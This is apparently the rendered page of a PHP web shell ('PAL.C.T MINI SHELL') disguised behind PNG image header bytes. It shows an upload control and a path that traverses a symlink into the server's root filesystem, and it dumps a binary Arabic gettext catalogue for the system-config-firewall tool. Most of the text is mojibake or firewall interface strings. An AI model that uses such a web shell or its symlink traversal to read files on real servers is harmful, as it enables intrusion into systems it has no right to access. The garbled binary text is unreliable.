php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /var/www/html/sub/images/sym/root/usr/share/locale/ar/LC_MESSAGES/
upload
files >> /var/www/html/sub/images/sym/root/usr/share/locale/ar/LC_MESSAGES/system-config-firewall.mo

O
$.6e1
1D
WeH}/XO[gnw	J  	 
 [ I!1"L"5[")")"""
#?#N#-S##
#y#$ $)$>9$x$s$$$%9)%c%<~%9%%6&E&
V&d&q&	&&&&&&!&&&&('*9'd'''7'''(
(("(2(L(\(v(P) *(*.*5*9**+#+6+&J+q+v+|+++++++,	,",*,,--l.i//0	0
0)050;0iT0m0V,1E12
22	22
3/$3T4h4{4444444<4K455&6A76y66g7
w77777777788Q3828*88899999@:/:8;S:;L;E;G!<Oi<K<V=I\=$=====%>
+>9>-?>;m>B>|>i?r?
??	???????@@@-@9A@{@@@@@@@@A=QBCCC
CDQDXD`DJqDDDD
DEEEEE8FMFRF^FcFiFGGHlIJ6KKMM-NKNeN%~NpN$O8:OCsOYObPtPaP5YQdQaQXVRRRSTqUVVcZWFYOZ
UZ
cZnZovZZZ
["[2[[^\k\|\]Z]r]]] ]
]] ]^^B^iV^^^^^^^_
_f*_______``4`?!a1aaaaaaabIccNe9Df&~fTf"f!g?gDUggggg-gPhImhhNiZifimivi	ii,iujEl
bmmmmm0n$)oNoUeoDo?p7@p
xp!pnpq;qWqdqzq frrrr
KsVs
t&t8tLRt&tct[*u7u8u(u v9vQvpv*}vvvvvv'v'w*6wDaw7ww w(xH=xxxxxx(x y(:y<cy:y:z|#|
*|5|
9|D}a}~}*}2}}~
~~*:~>e~7~$~'()RpyCNb:*A&ht)*مS.o
*>&Kry8)Djn
ً/,L<l:эS
`"k&&܏53,`e+
:͐]IfV'80XqzNg;[7ST^<yWf
d oCęI.Ux^Κ-
֛$5AN3U7(jD@
$)8bE}:ßK̢%֣
-ͤ"	$.$D iNg٦AF
V
alPSHhݭ
ǯ*Ұ$E"'h+<+³^hMTyE:	ȸ]l\ɼr ^y|,B"!.PMYtn&(<e*}0=
("
KV_]h	


%f&^*"$&KKU\7J%*3I4TID-R@
DY`'zAH}
G[J35*VG	?6m>1>WZ8/lu~
bUq2?.9#;4%6hBM7Qd;S%^P
p:r)!X$	N/cgiFxe2,9=_o( ('L=kt#a|E<,yK)8"A7CN\C1<BvO"]:H$+Kwj50E n*F&{sL03.&fOJM-+@!
ERROR - You must be root to run %s.%(option)s option requires %(count)s arguments%s is not a valid protocol.%s is not a valid range (start port >= end port).%s option does not take a value%s option requires an argument(modified)<b>Basic Firewall Settings</b><b>Configuration</b><b>Destination</b><b>Information</b><b>Source</b><b>User Skill Level</b><b>Your current configuration is empty, all traffic will be blocked.</b><big><b>Firewall Configuration Wizard</b></big><i>Save on stop</i> and <i>Save on restart</i> additionally save rule and chain counter.<icmp type><interface><mode><module><port>[-<port>]:<protocol><service><type>A <i>"System without network access"</i> does not need a firewall at all. This selection disables the firewall. Otherwise, choose <i>"System with network access"</i>.A firewall allows other computers to access selected services on your computer and helps to prevent unauthorized access beyond these selections. Select the services to which the firewall should allow access.A firewall protects against unauthorized network intrusions. Enabling a firewall blocks all incoming connections. Disabling a firewall allows all connections and is not recommended. AddAdd EntryAdd InterfaceAdd additional ports or port ranges, which need to be accessible for all hosts or networks.Add entries to forward ports either from one port to another on the local system or from the local system to another system. Forwarding to another system is only useful if the interface is masqueraded. Port forwarding is IPv4 only.Address '%s' is not valid.All %s devicesAllow access to necessary ports or port ranges, only.Allow access to necessary services, only.Allow all traffic on the specified deviceAmanda Backup ClientApplyApply changesAuthentication is required to read and modify firewall settingsBackBackwards compatibility, aliased to --enabledBaculaBacula ClientBacula is a network backup solution. Enable this option, if you plan to provide Bacula backup, file and storage services.Be more verboseBeginnerBeginner
ExpertBlock this ICMP type. The default is to accept all ICMP types.CancelClicking the 'Yes' button will override any existing firewall configuration. Are you sure that you want to do this?CloseConfiguration failedConfigure SELinux mode: %sConfigure SELinux type: Usually targeted or strict PolicyConfigure Service SettingsConfigure firewall but do not activate the new configurationConfigure firewall helper modules for connection trackingConfigure firewall rulesConfigure the iptables and ip6tables service settings.Conntrack HelperConverting %sCustom RulesCustom Rules FileCustomizeDNSDefault:DescriptionDesktopDesktop
ServerDestination (at least one needed)Destination UnreachableDisableDisable FirewallDisable Internet Printing Protocol (IPP)Disable Internet Protocol Security (IPsec)Disable Multicast DNS (mDNS)Disable an iptables moduleDisable firewallERROR: FirewallD is active, please use firewall-config.Echo Reply (pong)Echo Request (ping)EditEdit EntryEnableEnable FirewallEnable an iptables moduleEnable firewallEnable firewall (default)Enable this option if you want to allow remote virtual machine management with SASL authentication and encryption (digest-md5 passwords or GSSAPI/Kerberos). The libvirtd service is needed for this option to be useful.Enable this option if you want to allow remote virtual machine management with TLS encryption, x509 certificates and optional SASL authentication. The libvirtd service is needed for this option to be useful.EnabledErrorExpertFTPFTP is a protocol used for remote file transfer. If you plan to make your FTP server publicly available, enable this option. You need the vsftpd package installed for this option to be useful.Failed to remove %s.Failed to start %s.Failed to stop %s.Failed to write %s.Failed to write selinux configuration.FileFile:FilenameFirewallFirewall ConfigurationFirewall Configuration StartupFirewall Configuration WizardFirewall TableFirewall Table:Firewall authorizationFirewall:ForwardForward the port with protocol for the interface to either another local destination port (no destination address given) or to an other destination address with an optional destination port. This is IPv4 only.Forward to another portHTTP is the protocol used to serve Web pages. If you plan to make your Web server publicly available, enable this option. This option is not required for viewing pages locally or developing Web pages.HTTPS is a modified HTTP used to serve Web pages when security is important. Examples are sites that require logins like stores or web mail. This option is not required for viewing pages locally or developing Web pages. You need the httpd package installed for this option to be useful.Here you can define which services are trusted. Trusted services are accessible from all hosts and networks.Hit <i>OK</i> to apply your changes. You do not need to restart the firewall, the changes are effective as soon as they are applied.Hit enter to continue.ICMP FilterICMP TypeIMAP over SSLIP address:IPsecIPv6 has no nat support.If you clear the <i>keep configuration</i> button, the actual firewall configuration will be overwritten.If you enable local forwarding, you have to specify a port. This port has to be different to the source port.If you enable masquerading, IP forwarding will also be enabled for your IPv4 networks.If you need further firewall settings, please modify your configuration by hand, but keep in mind, that this tool is not able to load your custom configuration. If you are using this tool, all your manual changes will be lost. If you do not want to lose your manual configuration changes, leave this program without applying.IgnoreIgnore AllIgnore actual settingsInterfaceInterface '%s' is not valid.Interface:Internet Protocol Security (IPsec) incorporates security for network transmissions directly into the Internet Protocol (IP). IPsec provides methods for both encrypting data and authentication for the host or network it sends to. If you plan to use a vpnc server or FreeS/WAN, do not disable this option.Invalid argument %sKeep ConfigurationKey:List predefined services.List the supported icmp types.LoadLoad _Default ConfigurationLocal forwardingMail (SMTP)Make sure to open the destination port on the remote system.Mark all interfaces as trusted which should have full access to the system.Mark the ICMP types in the list, which should be rejected. All other ICMP types are allowed to pass the firewall. The default is no limitation.Mark the interfaces to be masqueraded.Masquerades traffic from the specified device. This is IPv4 only.MasqueradingMasquerading allows you to set up a host or router that connects your local network to the internet. Your local network will not be visible and the hosts appear as a single address on the internet. Masquerading is IPv4 only.Move Entry DownMove Entry UpMulticast DNS (mDNS)NFS4Network Printing Client (IPP)Network Printing Server (IPP)NoNo configurationNot configuredNumeric status outputOKOld firewall configuration.Only mark interfaces if you can trust all participants on that network interface.Open specific ports in the firewall (e.g, ssh:tcp)Open the firewall for a service (e.g, ssh)OpenVPNOpenVPN is a virtual private network (VPN) solution. It is used to create encrypted point-to-point tunnels between computers. If you plan to provide a VPN service, enable this option.Other PortsPOP-3 over SSLParameter ProblemParse error in config filePlease answer the questions in the following configuration steps. The wizard leads you back to the main application and hides all unnecessary configuration options.Please check your firewall settings after applying custom rules.Please enter a port or port range and protocol.Please enter a valid port number, service name or range.Please load a default configuration from the <i>Options</i> menu or use the wizard.Please remember to check if the services iptables and ip6tables are enabled.Please remember to check your firewall configuration before using it.Please select an entry from the list or enter a interface further down.Please select an entry from the list or enter a port and protocol further down.Please select keep configuration or choose to load a default configuration.Please select the protocol type, the firewall table and the file containing the rules.Please select the source and destination options according to your needs.Please specify your firewall skills.PortPort / Port Range:Port ForwardingPort and ProtocolPort or port range '%s' is not valid.Port/ProtocolPort:Predefined Services with Default Environment:Print a counter/number for every rule in the status output.Print addresses and ports in numeric format for the status output.Print information about the number of packets and bytes plus the <i>input-</i> and <i>outputdevice</i> in the status output.ProtocolProtocol '%s' is not valid.Protocol TypeProtocol Type:Protocol:QuitRADIUSRed Hat Cluster SuiteRedirectReloadReload current configurationRemoveRemove EntryRouter AdvertisementRouter SolicitationRun noninteractively; process only command-line argumentsSELinux Options (deprecated)SSHSambaSamba ClientSave and restore counterSave on restartSave on stopSave the active firewall configuration with all changes since the last start before restarting the firewall. Only do this if you need to preserve the active state for the next start.Save the active firewall configuration with all changes since the last start before stopping the firewall. Only do this if you need to preserve the active state for the next start.Secure Shell (SSH) is a protocol for logging into and executing commands on remote machines. It provides secure encrypted communications. If you plan on accessing your machine remotely via SSH over a firewalled interface, enable this option. You need the openssh-server package installed for this option to be useful.Secure WWW (HTTPS)SelectSelect <i>"Expert"</i> if you are familiar with firewall configurations or if you need to add user customized rules. Otherwise, choose <i>"Beginner"</i>.Select a FileServerServiceService SettingsSet firewall default type: %s. This overwrites any existing configuration.Show this help messageShow versionSource (all needed)Source QuenchSpecify a custom rules file for inclusion in the firewall, after the default rules. Default protocol type: ipv4, default table: filter. (Example: ipv4:filter:/etc/sysconfig/ipv4_filter_addon)Start WizardStart configuration wizardStatus line numbersSupported icmp types:System without network access
System with network accessTFTPTFTP ClientTODOTableThe Amanda backup client option allows you to connect to a Amanda backup and archiving server. You need the amanda-client package installed for this option to be useful.The Domain Name System (DNS) is used to provide and request host and domain names. Enable this option, if you plan to provide a domain name service (e.g. with bind).The Internet Message Access Protocol over SSL (IMAPs) allows a local client to access email on a remote server in a secure way. If you plan to provide a IMAP over SSL service (e.g. with dovecot), enable this option.The Internet Printing Protocol (IPP) is used for distributed printing. IPP (over tcp) provides the ability to share printers over the network. Enable this option if you plan to share printers via cups over the network.The Internet Printing Protocol (IPP) is used for distributed printing. IPP (over udp) provides the ability to get information about a printer (e.g. capability and status) and to control printer jobs. If you plan to use a remote network printer via cups, do not disable this option.The NFS4 protocol is used to share files via TCP networking. You will need to have the NFS tools installed and properly configure your NFS server for this option to be useful.The Post Office Protocol version 3 (POP3) is a protocol to retrieve email from a remote server over a TCP/IP connection. Enable this option, if you plan to provide a POP3 service (e.g. with dovecot).The Remote Authentication Dial In User Service (RADIUS) is a protocol for user authentication over networks. It is mostly used for modem, DSL or wireless user authentication. If you plan to provide a RADIUS service (e.g. with freeradius), enable this option.The Trivial File Transfer Protocol (TFTP) is a protocol used to transfer files to and from a remote machine in s simple way. It is normally used only for booting diskless workstations and also to transfer data in the Preboot eXecution Environment (PXE).The file '%s' does not exist.The firewall configuration is not consistent.The firewall is disabled.The firewall is enabled.The firewall table '%s' is not valid.The following files are missing or unusable:
	%s

Apply your firewall configuration now to correct this problem.The protocol type '%s' is not valid.There are unapplied changes, do you really want to quit?This error message informs a host to send packets on another route.This error message is generated by a host or gateway if the destination is not reachable.This error message is generated if the IP header is bad, either by a missing option or bad length.This error message is generated if the time-to-live was exceeded either of a packet or of the reassembling of a fragmented packet.This error message is generated to tell a host to reduce the pace at which it is sending packets.This message is the answer to an <i>Echo Request</i>.This message is used by a host attached to a multicast link to request a <i>Router Advertisement</i>This message is used by routers to periodically announce the IP address of a multicast interface.This message is used to test if a host is reachable mostly with the <i>ping</i> utility.This option allows a Bacula server to connect to the local machine to schedule backups. You need the bacula-client package installed for this option to be useful.This option allows incoming SMTP mail delivery. If you need to allow remote hosts to connect directly to your machine to deliver mail, enable this option. You do not need to enable this if you collect your mail from your ISP's server by POP3 or IMAP, or if you use a tool such as fetchmail. Note that an improperly configured SMTP server can allow remote machines to use your server to send spam.This option allows you to access Trivial File Transfer Protocol (TFTP) servers. You need the tftp package installed for this option to be useful.This option allows you to access Windows file and printer sharing networks. You need the samba-client package installed for this option to be useful.This option allows you to access and participate in Windows file and printer sharing networks. You need the samba package installed for this option to be useful.This option allows you to use the Red Hat Cluster Suite. Ports are opened for openais, ricci and dlm. You need the Red Hat Cluster Suite installed for this option to be useful.This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program.  If not, see <http://www.gnu.org/licenses/>.This program will help you to set up a basic firewall for your system.This wizard helps you to set up a clean firewall configuration for your system.Time ExceededTo AddressTo PortTo ensure a sane state, the kernel firewall modules must be unloaded when the firewall is restarted or stopped.Trusted InterfacesTrusted ServicesTypeUnload modules on restart and stopUpdate firewall non-interactively if the firewall is enabled. This will also restart the firewall. The -n and -f options will be ignored.Use custom rules files to add additional rules to the firewall. The custom rules are added after the default rules. The files must have the iptables-save format.User DefinedUser Skill LevelUsing these options with no additional firewall options will not create or alter firewall configuration, only SELinux will be configured.Valid values: %sValid values: <port>[-<port>], where port is either a number [0..65535] or a service name.Valid values: tcp, udpVerbose statusVirtual Machine ManagementVirtual Machine Management (TLS)WWW (HTTP)WarningWhat kind of system do you have?WizardYesYou can change the settings in the <i>Options</i> menu afterwards.Your firewall configuration was converted from an old version. Please verify the configuration and apply.[<type>:][<table>:]<filename>_About_File_Help_Options_Quit_Start Configuration Wizardconfigurationif=<interface>:port=<port>:proto=<protocol>[:toport=<destination port>][:toaddr=<destination address>]invalid interface '%s'.invalid port definition %s.invalid service '%s'.ipv6 has no nat support.localmDNS provides the ability to use DNS programming interfaces, packet formats and operating semantics in a small network without a conventional DNS server. If you plan to use Avahi, do not disable this option.modified labelno such option: %soption %(option)s: invalid forward_port '%(value)s'.option %(option)s: invalid forward_port '%(value)s': %(error)s.option %(option)s: invalid icmp type '%(value)s'.port range %s is not unique.system-config-firewalltranslator-creditsyesFirewall ConfigurationyesMark the ICMP types in the list, which should be rejected. All other ICMP types are allowed to pass the firewall. The default is no limitation.yesThe Internet Control Message Protocol (ICMP) is mainly used to send error messages between networked computers, but additionally for informational messages like ping requests and replies.yesUse custom rules files to add additional rules to the firewall. The custom rules are added after the default rules. The files must have the iptables-save format.Project-Id-Version: system-config-firewall
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2011-02-16 16:32+0200
PO-Revision-Date: 2013-11-20 09:28+0000
Last-Translator: moceap <moceap@hotmail.com>
Language-Team: Arabic (http://www.transifex.com/projects/p/system-config-firewall/language/ar/)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Language: ar
Plural-Forms: nplurals=6; plural=n==0 ? 0 : n==1 ? 1 : n==2 ? 2 : n%100>=3 && n%100<=10 ? 3 : n%100>=11 && n%100<=99 ? 4 : 5;

خطأ - يجب أن تكون المستخدم الجَذر لتشغيل  %s.الخيار %(option)s يتطلب %(count)s معطيات%s ليس ميفاقاً صالحاً.%s ليس مدى صالحاً  (بداية المنفذ >= نهاية المنفذ).%s خيار لا يأخذ قيمة%s خيار يتطلب مُعطى(تمّ تغييره)<b>إعدادات الجدار النّاريّ الأساسية</b><b>إعدادات</b><b>الوجهة</b><b>معلومات</b><b>مَصّدر</b><b>مستوى مهارة المستخدم</b><b>إعدادتك الحالية خاوية,سيتم حظر كل الحمل.</b><big><b>معالج إعدادات الجدار النّاريّ</b></big><i>حفظ عند التوقف</i> و <i>حفظ عند إعادة التشغيل</i> حفظ القاعدة و العداد المتسلسل أيضاً.<icmp type><interface><mode><module><port>[-<port>]:<protocol><service><type>لا يحتاج <i>"نظام دون اتصال شبكي"</i> جداراً ناريّاً على الإطلاق. هذا الخيار يعطّل الجدار الناريّ. اختر <i>"نظام ذو اتصال شبكيّ"</i> إذا كان لديك اتّصال شبكيّ على هذا الجهاز.سيسمح الجدار النّاريّ  لأجهزة الحاسوب الأخرى بالوصول إلى الخدمات المُختارة على حاسوبك,وسيساعد على منع الوصول غير المصرح به إلى أيّ شيء آخر . الرجاء اختيار الخدمات التي سيسمح الجدار النّاريّ بالوصول إليها.يحمي الجدار الناري من الدخول غير المصرّح به للشبكة. تمكين جدار ناريّ يمنع كل الاتّصالات القادمة. تعطيل الجدار النّاريّ يسمح بكلّ الاتّصالات وليس مُستحسناً.إضافةإضافة مدخلةإضافة واجهةإضافة منافذ او مدى منافذ بشكل إضافي, والتي ينبغي أن تتاح لجميع المضيفين أو الشبكات.أضف مُدخلاً لتحويل منفذ إلى آخر محلّيّ أو إلى نظام آخر. التحويل إلى نظام آخر مفيد إذا كانت الواجهة مُقنّعة. تحويل المنافذ يعمل على IPv4 فقط.العنوان '%s' غير صالح.جميع أجهزة %sالسماح للمَنافذ او مداها الضرورية بالوصول فقط.السماح  بالوصول للخدمات الضرورية فقط.اسمح بكل الحمل عبر الجهاز المُحدّدعميلة النسخ الاحتياطيّ أمانداتطبيقتَطبيق التَغْيراتالاستيثاق مطلوب من اجل قراءة وتعديل إعدادات الجدار النّاريّخلفاختيرَ تمكينُ التّوافق الرّجعيّباكُلاعميل باكُلايقدّم باكُلا حلول لبنّسخ الاحتياطي عبر الشّبكة. فعّل هذا الخيار إذا كان في خططك تقديم خدمات باكُلا من نسخ احتياطي ، ملفات و تخزين.يكون اكثر إسهاباًمبتدىءمبتدىء
خبيرحظر نوع رسائل مراقبة الشبكة هذا. المبدئي هو للموافقة على جميع أنواع رسائل مراقبة الشبكة.إلغاءالضّغط على زرّ 'نعم' سَيتخطّى أيّ إعدادات موجودة للجدار الناريّ. هل أنت متأكّد أنّك تريد فعل هذا؟إغلاقفَشِلت عملية الإعدادضبط وضع selinux: %sضبط نوع SELinux: غالبا مُستهدف أو سياسة صارمة.إعداد إعدادات الخدمةإعداد الجدار النّاري لكن دون تَنشيط الإعدادات الجديدةإعداد وحدات مساعدة الجادر النّاريّ لتتبع الاتصال.إعداد قَواعِد الجدار النّاريّإعداد عدادات خدمة iptables و ip6tables .متتبع الاتصال المساعديجري تَحويل %sتَخصيص قاعدةملف قواعد مُخَصصتَخصيصنظام أسماء النطاقات (DNS)مَبدَئي:وَصفسطح المكتبسطح المكتب
خادمالوجهةلا يمكن الوصول للوجهةتَعطّيلتَعطّيل الجدار النّاريتَعطيل ميفاق الطباعة عبر الإنترنت (IPP)تَعطيل ميفاق أمن الإنترنت -IPsec-تَعطّيل mDNS تَعطيل وِحدة iptablesتعطّيل الجدار النّاريخطأ: FirewallD مفعّل ، استخدم firewall-config رجاءً.رَدّ الصَدى (pong)طَلب الصَدى (ping)تَحريرتحرير مدخلةتَمكينتَمكين الجدار النّاريتَمكين وِحدة iptablesتَمكين الجدار النّاريتفّعيل الجدار النّاريّ (المبدئي).فعّل هذا الخيار إذا رغبت بالسّماح بالإدارة البعيدة للآلة الافتراضيّة المدّعمة باستيثاق SASL و تشفير (digest-md5 passwords أو GSSAPI/Kerberos). خدمة المكتبة libvirtd ضرورية لجعل هذا الخيار فاعلًا.فعّل هذا الخيار إذا رغبت بالسّماح بالإدارة البعيدة للآلة الافتراضيّة المدّعمة بتشفير TLS و شهادات x509 و اختياريًا استيثاق SASL. خدمة المكتبة libvirtd ضرورية لجعل هذا الخيار فاعلًا.مُمكّنخطأتصديرFTPيستخدم ميفاق (FTP) لنقل الملفات عبر الشبكة. فعّل هذا الخيار إذا كنت تخطّط لجعل خادمك متوفّراً للعامة. تحتاج لحزمة vsftpd مثبّتة ليكون هذا الخيار مفيداً.فَشِل في حَذف %s.فَشِل في بَدء %s.فَشِل في وَقف %s.فَشِلِ في عملية كتابة %sفَشِل في كتابة إعدادات selinux.مَلفملف:إسم المَلفالجدار النّاريإعدادات الجدار النّاريبدأ تشغيل إعدادات الجدار النّاريّمُعالج إعدادات الجدار النّاريجدول الجدار النّاريجدول الجدار النّاريّ:تصريح الجدار النّاريّاالجدار النّاريأمامتحويل المنفذ بالميفاق للواجهه الى مَنفذ وجهة محلية اخرى أو إلى عنوان وجهة اخرى مع اختيار منفذ الوجهة. فقط لـipv4.تَحويل لمنفذ اخريستخدم ميفاق HTTP لتزويد صفحات الشبطة العنكبوتيّة (ويب web). فعّل هذا الخيار إذا كنت تخطّط لجعل خادمك متوفّراً للعامّة. هذا الخيار ليس مطلوباً لبرمجة وتطوير المواقع ولعرض الصفحات محلّياً.يستخدم HTTPS لتزويد صفحات الويب عندما يكون الأمن ضروريّاً. من الأمثلة على ذلك المواقع التي تتطلب تسجيل دخول، كالمتاجر ومواقع البريد الإلكترونيّ. هذا الخيار ليس مطلوباً لبرمجة وتطوير المواقع ولعرض الصفحات محلّياً. تحتاج لحزمة httpd مثبّتة ليكون هذا الخيار مفيداً.هنا يمكنك تحديد اي الخدمات موثوقة. الخدمات الموثوقة يمكن الوصول إليها من جميع المضيفين والشبكات.إضغط  <i>حسنا</i> لتَطبيق التغيرات. ستكون التغيرات فعالة عند تطبيقها ولن تحتاج لإعادة تشغيل الجدار النّاريّ.انقر زرّ دخول للمتابعة.مُرشح ميفاق رسائل مراقبة الشبكة -ICMP-نوع ICMPIMAP على SSLرقم العنوان عبر الشبكةميفاق أمن الانترنت -IPsec-غير مدعوم IPv6.اذا الغيت تحديد زر <i>ابقاء الإعدادات </i>, ستتم عملية كتابة اعدادات الجدار النّاريّ الفعلية.اذا مكنت التحويل المحلي لديك لتحديد منفذ.هذا المنفذ قد يكون مختلف عن المنفذ المصدر.إذا فعّلت التقنيع، فسيُفَعّل لشبكات IPv4 أيضاً.إذا احتجت خيارات جدار ناريّ متقدّمة أكثر، عدّل الإعدادات يدويّاً، ولكن انتبه إلى أن هذه الأداة لن تُحمِّل إعداداتك المُخصّصة. إذا لم ترد خسارة إعداداتك المُخصّصة، اترك هذا البرنامج دون تطبيق إعداداته.تجاهلتجاهل الكُلتجاهل الإعدادت الحاليةواجِهةالواحهة '%s' غير صالحة.الواجهة:يؤمّن ميفاق أمن الإنترنت (IPsec) النقل الشبكي مباشرة عبر ميفاق الإنترنت (IP). يوفّر IPsec طرقاً لتشفير البيانات والاستيثاق للمضيف أو الشبكة التي يرسل لها. إذا كنت تخطط لاستخدام خادم VPNC أو FreeS/WAN، فلا تعطّل هذا الخيار.مُعطى غير صالح %sابقاء الإعداداتمفتاح:قائمة مُسبقة بالخدمات.قائمة بالأنواع المدعومة من موافيق رسائل مراقبة الشبكة-ICMP-.تحميلتحميل _الإعدادات المبدئيةتَحويل مَحليبريد (SMTP)تأكد من فتح منفذ الوجهه على النظام البعيد.حدد كل الواجهات كموثوقة والتي يجب ان تعطي وصول كامل للنظام. علّم أنواع ICMP التي سترفض في القائمة. كلّ أنواع ICMP الأخرى سيسمح لها بالمرور عبر الجدار الناريّ. المبدئيّ هو عدم وجود قيود.تعليم جميع الواجهات لتكون منكرةاسمح بكل الحمل عبر الجهاز المُحدّد.عبر IPv4 فقط.تنكُريسمح لك التقنيع أن تعدّ مضيفاً أو موجّهاً ليوصل شبكتك المحلّية بالشبكة العالميّة. ستظهر جميع الأجهزة على هذه الشبكة كعنوان واحد على الإنترنت. التقنيع لـIPv4 فقط.تحريك المدخلة للاسفلتحريك المدخلة للاعلىMulticast DNS (mDNS)NFS4عَميل الطِباعة عبر الشبكة -IPP-خادم الطِباعة عبر الشبكة -IPP-لالا توجد إعداداتغير مُعَدّإخراج الحالة بشكل رقميّحسناًإعدادات الجدار النَاريّ القديم.علّم الواجهة فقط إذا كنت تثق بكلّ الاتّصالات عليها.السماح لمنافذ معيّنة عبر الجدار النّاريالسماح لخدمة معينة عبر الجدار النّاريّ (ssh مثلا)OpenVPNتستخدم الشبكة التخيّليّة الخاصّة (VPN) وخدمة (OpenVPN) لإنشاء قنوات اتصال نقطة-نقطة مشفّرة بين الحواسيب.فعّل هذا الخيار إذا كنت تخطّط لإتاحة خدمة VPN.منافذ أخرىPOP-3 على SSLمُشكلة مُعامِلاتخطأ في إعراب ملف الإعداداتالرجاء الإجابة على الأسئلة في خطوات الإعداد التالية. سيعيدك المعالج إلى البرنامج الرئيسيّ، ويخفي كلّ خيارات الإعداد غير الضروريّة.من فضلك، قم بفحص إعدادات جدارك الناريّ بعد تطبيق قواعد مخصّصة.الرجاء إدخال رقم المَنفذ أو مداه و الميفاق.الرجاء إدخال رقم أو مدى مَنافذ صالحين أو اسم خدمة صالحة . من فضلك، قم بتحميل الإعدادات الافتراضيّة من قائمة <i>إعدادات</i> أو استخدم المعالج.الرجاء  التأكد من أن خدمتي  iptables و ip6tables مُفَعلتان .تذكّر فحص إعدادات جدارك الناريّ قبل استخدامه.يرجى اختيار مُدخل من القائمة أو إدخال الواجهة.يرجى اختيار مُدخل من القائمة أو إدخال ميفاق أو منفذ.من فضلك، اختر الاحتفاظ بالإعدادات أو تحميل الإعدادات الافتراضيّة.الرجاء اختيار نوع الميفاق , جدول الجدار النّاري و الملف الذي يحتوي على القواعد.الرجاء تحديد المصدر وخيارات الوجهه وفقا لحاجتك.الرجاء تحديد مستوى مهارتك في التعامل في الجدار النّاريّمَنفذمَنفذ/مدى المَنفذتحويل مَنفذالمنفذ والميفاقالمَنفذ أو نطاق المَنافذ '%s' غير صالح.مَنفذ/ميفاقالمَنفذ:خدمات محددة مسبقا مع البيئة الافتراضية :.طِباعة العداد/الرقم لكل قاعدة في إخراج الحالة..طباعة العناوين والمَنافذ بشكل رقميّ لإخراج الحالة. طِباعة معلومات عن عدد الحزم وحجمها إضافة إلى <i>جهاز الإدخال</i> و <i>الإخراج</i> في إخراج الحالة.ميفاقالميفاق '%s' غير صالح.نَوع الميفاقنوع الميفاق:ميفاق:مغادرةRADIUSطقم Red Hat للشبكات العنقوديّة.إعادة توجيهإعادة تحميلإعادة تحميل الإعدادات الحاليةحَذفحَذف المدخلةإعلان موجـِّهالتماس موجـِّهالتَشغيل بشكل غير تفاعليّ؛ معالجة مُعطيات سطر الأوامر فقطخيارات الأمن المتقدّم للينكس (سيّء)SSHسامباعميل سامباحِفظ وتفريغ العَدادحِفظ عند إعادة التشغيلحفظ عند التوقفحفظ إعدادات الجدار النّاريّ النَشِطة مع جميع التغيرات منذ آخر عملية تشغيل قبل إعادة تشغيل الجدار النّاريّ. افعل هذا فقط إذا كنت بحاجة للحفاظ على الوضع الحاليّ عند التشغيل المقبل.حفظ إعدادات الجدار النّاريّ النَشِطة مع جميع التغيرات منذ آخر عملية تشغيل قبل إيقاف الجدار النّاريّ. افعل هذا فقط إذا كنت بحاجة للحفاظ على الوضع الحاليّ عند التشغيل المقبل.الصدفة الآمنة (SSH) هو ميفاق للدخول وإعطاء أوامر لأجهزة بعيدة، ويوفر  اتصالات آمنةً ومشفّرة. إذا كنت تخطّط للوصول إلى جهازك عن بعد باستخدام الصدفة الآمن عبر واجهة محميّة بجدار ناريّ، فعّل هذا الخيار. تحتاج إلى حزمة openssh-server مثبّتة ليكون هذا الخيار ذا فائدة.الشبكة العنكبوتيّة العالميّة الآمنة (HTTPS)اختيارإذا كنت تعرف إعدادات الجدار الناريّ أو تريد إضافة قاعدة مخصّصة، اختر "خبير". عدا ذلك، اختر "مبتدئ".اختر ملفّـاًخادمخِدمةإعدادات الخدمةتعيين النوع المبدئي للجدار النّاريّ: %s.  و الكتابة فوق اي إعدادت موجودةإظهار رسالة المساعدة هذهإظهار الإصدارةالمصدر (الكل ضروري)إخماد المصدرتحديد ملف قواعد مخصص للتضمين في الجدار النّاريّ بعد الإعدادات المبدئية .الميفاق المبدئي :ipv4, الجدول المبدئي:مُرشح. (مثال: ipv4:filter:/etc/sysconfig/ipv4_filter_addon)بدأ المعالجبدأ معالج الإعداداتأرقام أسطر الحالةأنواع موافيق رسائل مراقبة الشبكة المدعومة:النظام دون الوصول إلى الشبكة
النظام مع الوصول إلى الشبكةTFTPعَميل TFTPللعملجَدولتتيح لك خيار عميل أماندا الاتصال بخوادم أماندا للأرشفة والنسخ الاحتياطيّ. تحتاج حزمة amanda-client مثبّتة للاستفادة من هذا الخيار.يستخدم نظام أسماء النطاقات (DNS) لطلب وتوفير أسماء النطاقات والمضيفين. فعّل هذا الخيار إذا كنت تخطّط لإتاحة خدمة أسماء النطاقات (bind مثلاً)يسمح ميفاق الوصول لرسائل الإنترنت على طبقة المأخذ المؤمَّن (IMAPs) لعميل محليّ الاتصال بالبريد على خادم بعيد بطريقة آمنة. فعّل هذا الخيار إذا كنت تخطّط لإتاحة هذا الخدمة (عن طريق dovecot مثلاً).يستخدم بروتوكول الطباعة عبر الإنترنت (IPP) للطباعة الموزّعة. يوفّر IPP (على udp) إمكانيّة مشاركة طابعات عبر الشبكة. فعّل هذا الخيار إذا كنت تخطّط لمشاركة طابعات عبر الشبكة عن طريق نظام طباعة يونكس الشائع.يستخدم بروتوكول الطباعة عبر الإنترنت (IPP) للطباعة الموزّعة. يوفّر IPP (على udp) إمكانيّة الحصول على معلومات عن طابعة (الحالة والإمكانيات مثلاً) والتّحكم في أعمال الطابعة. إذا كنت تخطّط لاستخدام طابعة شبكة بعيدة عن طريق نظام طباعة يونكس الشائع، لا تعطّل هذا الخيار.يستخدم ميفاق NFS4 لمشاركة الملفات عبر شبكات TCP. تحتاج إلى أدوات NFS مثبّتة وخادم معدّ بشكل جيّد ليكون هذا الخيار ذا فائدةيستخدم ميفاق مكتب البريد الإصدار الثالث (POP3) لاستقطاب البريد من خادم 